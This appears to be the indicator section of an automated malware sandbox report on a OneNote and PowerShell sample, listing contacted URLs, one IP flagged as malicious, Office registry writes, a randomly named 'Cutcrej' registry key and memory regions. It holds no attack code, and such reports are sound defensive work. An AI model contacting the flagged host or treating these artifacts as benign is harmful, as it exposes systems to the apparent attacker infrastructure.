https://api.aadrm.com
unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid=
unknown
https://globaldisco.crm.dynamics.com
unknown
https://messaging.engagement.office.com/
unknown
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
unknown
https://dev0-api.acompli.net/autodetect
unknown
https://www.odwebp.svc.ms
unknown
https://api.diagnosticssdf.office.com/v2/feedback
unknown
https://api.powerbi.com/v1.0/myorg/groups
unknown
https://web.microsoftstream.com/video/
unknown
https://api.addins.store.officeppe.com/addinstemplate
unknown
https://schema.org
unknown
https://graph.windows.net
unknown
https://dataservice.o365filtering.com/
unknown
https://officesetup.getmicrosoftkey.com
unknown
https://analysis.windows.net/powerbi/api
unknown
https://prod-global-autodetect.acompli.net/autodetect
unknown
https://outlook.office365.com/autodiscover/autodiscover.json
unknown
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
unknown
https://consent.config.office.com/consentcheckin/v1.0/consents
unknown
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
unknown
https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
unknown
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
unknown
https://d.docs.live.net
unknown
https://ncus.contentsync.
unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
unknown
https://www.linkedin.com/company/1035
unknown
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
unknown
http://weather.service.msn.com/data.aspx
unknown
https://apis.live.net/v5.0/
unknown
http://schema.org/Organization
unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
unknown
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
unknown
https://messaging.lifecycle.office.com/
unknown
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
unknown
https://pushchannel.1drv.ms
unknown
https://management.azure.com
unknown
https://outlook.office365.com
unknown
https://login.windows.net
unknown
https://wus2.contentsync.
unknown
https://incidents.diagnostics.office.com
unknown
https://clients.config.office.net/user/v1.0/ios
unknown
https://make.powerautomate.com
unknown
https://insertmedia.bing.office.net/odc/insertmedia
unknown
https://o365auditrealtimeingestion.manage.office.com
unknown
https://outlook.office365.com/api/v1.0/me/Activities
unknown
https://api.office.net
unknown
https://incidents.diagnosticssdf.office.com
unknown
https://www.skype.com/de/
unknown
https://asgsmsproxyapi.azurewebsites.net/
unknown
https://clients.config.office.net/user/v1.0/android/policies
unknown
https://aka.ms/pscore6
unknown
https://entitlement.diagnostics.office.com
unknown
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
unknown
https://substrate.office.com/search/api/v2/init
unknown
https://outlook.office.com/
unknown
https://storage.live.com/clientlogs/uploadlocation
unknown
There are 90 hidden URLs, click here to show them.

IPs

IP
Domain
Country
Malicious
87.236.146.31
unknown
United Kingdom
malicious
197.0.104.172
unknown
Tunisia

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Sampling
12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\ONENOTE\6420
0
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\Resiliency\StartupItems
v"=
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Experiment\onenote
Language
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Experiment\onenote
EcsRequestPending
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Experiment\onenote
SubscriptionCustomerLicenseInfo
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Word\Addins\OneNote.WordAddinTakeNotesButton
CommandLineSafe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Word\Addins\OneNote.WordAddinTakeNotesButton
Description
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Word\Addins\OneNote.WordAddinTakeNotesButton
FriendlyName
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Word\Addins\OneNote.WordAddinTakeNotesButton
LoadBehavior
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\PowerPoint\Addins\OneNote.PowerPointAddinTakeNotesButton
CommandLineSafe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\PowerPoint\Addins\OneNote.PowerPointAddinTakeNotesButton
Description
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\PowerPoint\Addins\OneNote.PowerPointAddinTakeNotesButton
FriendlyName
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\PowerPoint\Addins\OneNote.PowerPointAddinTakeNotesButton
LoadBehavior
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\General
LastMyDocumentsPathUsed
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\TypeLib\{F2A7EE29-8BF6-4a6d-83F1-098E366C709C}\1.0\0\win64
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\TypeLib\{0EA692EE-BB50-4E3C-AEF0-356D91732725}\1.1\0\win64
NULL
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\General
ProgressWindowPosLeft
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\General
ProgressWindowPosTop
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\General
ConsecutiveBootCrashes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\General
ConsecutiveEarlyCrashes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\General
EDPLastRevokeCheckTime
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote
FlightedVersion
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\Options\Save
BackupFilenamePostfixStartSP1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\Options\Save
BackupFilenamePostfixEndSP1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\Options\Save
BackupFilenamePostfixEndRerepairSP1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote
FirstBootStatus
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\OpenNotebooks
1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\Resiliency
RepairQuickNotesOnBoot
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\General
DateLastAttemptedOpeningLocalNotebooksOnBoot
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\RulesLastAudienceReported
onenote.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\FavoritePens
Data
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\Page Sync Status
PageSyncStatusPersistentData
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\Page Sync Status
PageSyncStatusPersistentDataLastUpdateDate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\General
LastCacheFclRepairSuccessTime
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Experiment\onenote
BuildNumber
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote
Expires
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData
1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData
1.1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData
1.2
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData
1.3
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData
1.4
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData
1.5
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData
1.6
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData
1.7
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData
1.8
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData
1.9
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData
1.10
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData
1.11
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData
1.12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData
1.13
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData
1.14
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData
1.15
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData
VersionId
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote
ETag
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote
DeferredConfigs
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote
ConfigIds
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\RecentNotebooks
FOLDERID_Desktop
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\RecentNotebooks
FOLDERID_Documents
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\Place MRU
FOLDERID_Desktop
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\Place MRU
FOLDERID_Documents
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\Options\Paths
UnfiledNotesSection
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\General
LastAppliedNotebookColor
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Roaming
RoamingLastSyncTimeOneNote
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Roaming
RoamingLastWriteTimeOneNote
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified
onenote.exe_queried
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified
onenote.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\onenote.exe
RulesEndpoint
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\onenote.exe\ETWMonitor\{F562BB8E-422D-4B5C-B20E-90D710F7D11C}
4
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\onenote.exe\ETWMonitor\{F562BB8E-422D-4B5C-B20E-90D710F7D11C}
Categories
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\onenote.exe\ETWMonitor\{02FD33DF-F746-4A10-93A0-2BC6273BC8E4}
4
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\onenote.exe\ETWMonitor\{02FD33DF-F746-4A10-93A0-2BC6273BC8E4}
Categories
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\onenote.exe\ULSMonitor
ULSTagIds0
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\onenote.exe\ULSMonitor
ULSTagIds1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\onenote.exe\ULSMonitor
ULSCategoriesSeverities
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\onenote.exe\ULSMonitor
ULSAllCategories
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\General
LastNotebookSyncTypeLogTime
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Volatile
MsaDevice
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\000061091A0090400100000000F01FEC\Usage
OneNoteNonBootFilesIntl_1033
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\onenote.exe\ETWMonitor\{F562BB8E-422D-4B5C-B20E-90D710F7D11C}
4
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\onenote.exe\ETWMonitor\{F562BB8E-422D-4B5C-B20E-90D710F7D11C}
Categories
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\onenote.exe\ETWMonitor\{02FD33DF-F746-4A10-93A0-2BC6273BC8E4}
4
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\onenote.exe\ETWMonitor\{02FD33DF-F746-4A10-93A0-2BC6273BC8E4}
Categories
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\onenote.exe\ULSMonitor
ULSTagIds0
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\onenote.exe\ULSMonitor
ULSTagIds1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\onenote.exe\ULSMonitor
ULSCategoriesSeverities
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\onenote.exe\ULSMonitor
ULSAllCategories
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\Options\Save
BackupSharePointNotebooks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400100000000F01FEC\Usage
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400100000000F01FEC\Usage
OCR_1033
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-GB
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-GB
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common
SessionId
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\ONENOTE\6420
0
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext
homebusiness2019retail
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\TypeLib\{F2A7EE29-8BF6-4a6d-83F1-098E366C709C}\1.0
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\TypeLib\{F2A7EE29-8BF6-4a6d-83F1-098E366C709C}\1.0\0\win64
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\TypeLib\{0EA692EE-BB50-4E3C-AEF0-356D91732725}\1.1
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\TypeLib\{0EA692EE-BB50-4E3C-AEF0-356D91732725}\1.1\0\win64
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Interface\{E2E1511D-502D-4BD0-8B3A-8A89A05CDCAE}\ProxyStubClsid32
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\Interface\{E2E1511D-502D-4BD0-8B3A-8A89A05CDCAE}\ProxyStubClsid32
NULL
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote
FirstBootStatus
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote
FirstBootStatus
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--syslcid=2057&build=16.0.14326&crev=3\0
FilePath
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--syslcid=2057&build=16.0.14326&crev=3\0
StartDate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--syslcid=2057&build=16.0.14326&crev=3\0
EndDate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Roaming
RoamingConfigurableSettings
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote
Expires
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\ONENOTE\6420
0
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\ONENOTE\6420
0
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote
FirstBootStatus
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Licensing
NextUserLicensingLicenseIds
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache
LastClean
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Property
0018400A8DD3FAA8
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935}
DeviceTicket
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935}
DeviceId
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\General
LastAppliedNotebookColor
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\General
LastAppliedNotebookColor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\000061091A0090400100000000F01FEC\Usage
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\000061091A0090400100000000F01FEC\Usage
OneNoteFilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F00000000100000000F01FEC\Usage
OneNoteFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Cutcrej
6b0e8805
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Cutcrej
5e91584b
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Cutcrej
5cd07837
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Cutcrej
e46c1f52
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Cutcrej
996450d8
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Cutcrej
21d837bd
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Cutcrej
e62d3f2e
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Cutcrej
1447e7f3
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Cutcrej
6b0e8805
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Cutcrej
6b0e8805
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Cutcrej
6b0e8805
There are 154 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
2E5A000
heap
page read and write
 malicious
4D31000
heap
page read and write
7FFE38810000
trusted library allocation
page read and write
21A24CFD000
heap
page read and write
21A24AE0000
heap
page read and write
47AF000
heap
page read and write
21A24B8C000
heap
page read and write
4677000
heap
page read and write
21A0AC10000
trusted library allocation
page read and write
4677000
heap
page read and write
2C79EFC7000
heap
page read and write
1C6ECCB4000
heap
page read and write
1C6ECCC5000
heap
page read and write
2CE4000
heap
page read and write
1C6ECC00000
heap
page read and write
1C6ECCB7000
heap
page read and write
A3C000
stack
page read and write
2E50000
heap
page read and write
A54000
heap
page read and write
57B8000
heap
page read and write
1001A000
direct allocation
page readonly
1C6ECCB0000
heap
page read and write
1C6ECCFB000
heap
page read and write
4677000
heap
page read and write
4677000
heap
page read and write
4679000
heap
page read and write
21EC2F70000
heap
page read and write
4677000
heap
page read and write
21A24B1F000
heap
page read and write
21A24A90000
trusted library allocation
page read and write
7FFE38770000
trusted library allocation
page read and write
21A0AA28000
heap
page read and write
7FFE385F0000
trusted library allocation
page execute and read and write
21A0A986000
heap
page read and write
47AF000
heap
page read and write
69373000
unkown
page read and write
21A24BD5000
heap
page read and write
21A24BDA000
heap
page read and write
25C02640000
heap
page read and write
1C6ECCE0000
heap
page read and write
1C6ECCFB000
heap
page read and write
7FFE38840000
trusted library allocation
page read and write
47AF000
heap
page read and write
65AA7FB000
stack
page read and write
5EA3000
heap
page read and write
21A0A800000
heap
page read and write
2E30000
heap
page read and write
7FFE387E0000
trusted library allocation
page read and write
21A0A9BF000
heap
page read and write
5110000
heap
page read and write
2C79F090000
heap
page read and write
21A0AC40000
heap
page read and write
65AB077000
stack
page read and write
4677000
heap
page read and write
4E80000
trusted library allocation
page read and write
1C6ECCB7000
heap
page read and write
21A24D0D000
heap
page read and write
21EC242B000
heap
page read and write
5014000
heap
page read and write
B6F173D000
stack
page read and write
4677000
heap
page read and write
1C6ECCCF000
heap
page read and write
4677000
heap
page read and write
4682000
heap
page read and write
1C6ECCD6000
heap
page read and write
21A24F70000
heap
page read and write
7FFE38720000
trusted library allocation
page execute and read and write
51EC000
heap
page read and write
21EC2F23000
heap
page read and write
4679000
heap
page read and write
47AF000
heap
page read and write
65AA97F000
stack
page read and write
1C6ECCC5000
heap
page read and write
21A24C00000
heap
page read and write
B6F15BE000
stack
page read and write
1C6ECCDA000
heap
page read and write
21EC2F8A000
heap
page read and write
2C79EFBC000
heap
page read and write
5FB0000
heap
page read and write
4677000
heap
page read and write
21A24BE0000
heap
page read and write
4677000
heap
page read and write
21A0CA4F000
trusted library allocation
page read and write
7FFE385EC000
trusted library allocation
page execute and read and write
509C000
heap
page read and write
21A24D17000
heap
page read and write
1C6ECCF7000
heap
page read and write
4683000
heap
page read and write
21A0AA16000
heap
page read and write
4695000
heap
page read and write
7FFE386F0000
trusted library allocation
page execute and read and write
708F000
heap
page read and write
51EC000
heap
page read and write
4677000
heap
page read and write
21A0AA60000
heap
page read and write
2CE4000
heap
page read and write
21A24B6B000
heap
page read and write
4677000
heap
page read and write
1C6ECC13000
heap
page read and write
21A0AA21000
heap
page read and write
21A0A99D000
heap
page read and write
21EC24EE000
heap
page read and write
21A0AC20000
heap
page readonly
4634000
heap
page read and write
4677000
heap
page read and write
4611000
heap
page read and write
21A0C6AF000
trusted library allocation
page read and write
1C6ECD00000
heap
page read and write
4677000
heap
page read and write
4677000
heap
page read and write
4E80000
trusted library allocation
page read and write
4D31000
heap
page read and write
21A24D20000
heap
page read and write
1C6ECCC0000
heap
page read and write
69390000
unkown
page write copy
1C6ECC54000
heap
page read and write
465C000
heap
page read and write
21A0A9A7000
heap
page read and write
1C6ECCFA000
heap
page read and write
7FFE38850000
trusted library allocation
page read and write
65AADFF000
stack
page read and write
47B2000
heap
page read and write
4677000
heap
page read and write
2C79EFC4000
heap
page read and write
21EC2478000
heap
page read and write
47B4000
heap
page read and write
7FFE38700000
trusted library allocation
page execute and read and write
21A24A70000
trusted library allocation
page read and write
4677000
heap
page read and write
B6F13BE000
stack
page read and write
2E9D000
heap
page read and write
10021000
direct allocation
page readonly
469A000
heap
page read and write
21A24BBE000
heap
page read and write
4693000
heap
page read and write
2C79EF98000
heap
page read and write
7FFE38830000
trusted library allocation
page read and write
21A1C591000
trusted library allocation
page read and write
4677000
heap
page read and write
